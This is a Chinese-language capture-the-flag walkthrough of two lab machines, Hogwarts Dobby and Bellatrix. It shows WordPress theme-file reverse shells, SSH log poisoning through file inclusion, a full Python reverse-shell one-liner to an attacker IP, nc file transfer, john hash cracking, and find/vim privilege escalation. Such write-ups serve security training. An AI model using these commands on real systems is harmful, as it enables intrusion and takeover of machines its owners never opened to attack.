Hogwarts: Dobby

0x01 信息收集

nmap命令进行主机发现和端口扫描,发现目标主机仅开放80端口。

访问80端口发现网页title似乎是一个base编码字符串。

curl http://192.168.56.228/,除了title的字符串以外还有发现。

<title>Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==</title>

<!--
     See: /alohomora
  -->

base64解码得到:too easy no? Potter。访问/alohomora目录,提示:Draco's password is his house ;),draco的密码是他的房子,百度得到Malfoy Manor

目录扫描。

image-20250925161409855

/log,依旧是base64解码得到密码::ilikesocks

image-20250925161451378

/DiagonAlley/

有一段brainFuck编码,但是解不出来。

+++++ +++++ [->++ +++++ +++<] >.<++ +[->+ ++<]> ++.<+ ++[-> —<] >—- ..<++ ++[-> ++++< ]>+++ ++++. <++++ [->– –<]> .<+++ [->++ +<]>+ .<+++ +[->- —<] >–.< ++++[ ->+++ +<]>+ +++.- -.<++ +[->- –<]> —– .<+++ [->++ +<]>+ +++.<

不过一看blog和页面布局,猜测wordpress,下拉页面到底部的确找到wordpress。

0x02 wpscan爆破后台用户密码

wpscan --url xxxx -e u,p,t

存在用户draco和Draco,结合前面提示试试密码是不是Malfoy Manor,大小写删除空格都试了,不行。根据Draco's house联想到他所在的学院slytherin

draco:slytherin,成功登录到后台。

0x03 wordpress Theme getshell

查看当前主题,修改对应主题文件。例如:往404.php写入kali的反弹shell。

开启监听,访问http://192.168.56.228/DiagonAlley/index.php/blog/+任意字符串反弹shell。

0x04 suid提权

在dobby家目录下找到flag1.txt,没有cat命令就用nl命令替代。

flag1{28327a4964cb391d74111a185a5047ad}

dobby,前面有一个密码::ilikesocks没用,这俩很容易联想到一起。经过尝试这组用户名密码是:dobby:ilikesocks

image-20250926103606300

试试sudo提权,无果。

find / -perm -u=s 2>/dev/null,find命令可以试试。

image-20250926102904810

/usr/bin/find  . -exec /bin/sh -p \; -quit

成功提权。

image-20250926102930241

Hogwarts: Bellatrix

0x01 信息收集

nmap扫描主机,开放端口:22,80.

访问80端口,F12检查页面元素,找到提示:存在一个php文件有文件包含漏洞,并且参数是file。页面内容最后一行有php字样,找规律,发现在重复ikilledsiriusblack,试试ikilledsiriusblack.php

尝试包含ssh登录日志文件/var/log/auth.log,有回显内容。

0x02 ssh日志文件投毒

存在文件包含漏洞,且能读取到ssh登录日志,接下来就是利用。

只需要两步:

  1. 首先ssh连接时将用户名修改为一句话木马(推荐用远程连接软件)。验证是否写入成功。http://192.168.56.229/ikilledsiriusblack.php?file=../../../var/log/auth.log&cmd=id

  2. 通过命令执行反弹shell。

    &cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.109",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

通过python3获得完整TTY:python3 -c 'import pty;pty.spawn("/bin/bash")'

0x03 密码哈希爆破

/var/www/html/c2VjcmV0cw==目录下两个文件,分别是lestrange的密码哈希和一个字典文件。

nc命令将两个文件传输至攻击机方便使用。

  • 接收方:nc -l -p 端口号 > 文件名

  • 发送方:nc IP地址 端口号 < 文件名

john指定字典破解。

john --wordlist=hash_dict.txt Swordofgryffindor

lestrange:ihateharrypotter

0x04 sudo提权

切换到lestrange,sudo -l,vim命令可用。

sudo vim -c ':!/bin/sh'

image-20250926170148179

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐